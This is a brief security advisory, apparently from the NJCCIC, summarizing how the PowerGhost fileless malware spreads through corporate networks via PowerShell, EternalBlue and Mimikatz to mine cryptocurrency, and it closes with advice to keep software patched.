Fileless Malware Targeting Corporate Systems
Threat actors are deploying a new fileless malware to target corporate networks across the world. Dubbed PowerGhost, the fileless malware is distributed by infecting a single system in a business network and then propagates to other computers and servers on the network via PowerShell, EternalBlue, and Mimikatz. Once infected, devices are used to mine cryptocurrency, allowing threat actors to make a quick profit as the number of infected devices increases. The infection process begins with the attacker deploying exploits or remote administration tools such as Windows Management Instrumentation. During the infection process, a one-line PowerShell script runs and downloads a cryptocurrency miner, Mimikatz, EternalBlue exploit shellcode, and a reflective PE injection module. Once one machine is infected, Mimikatz is used to collect account credentials from the current machine and works together with the EternalBlue exploit to propagate through the network and infect additional devices. The NJCCIC recommends users and administrators review SecureList’s blog post for more information and keep all software patched and up-to-date to prevent the exploitation of known vulnerabilities.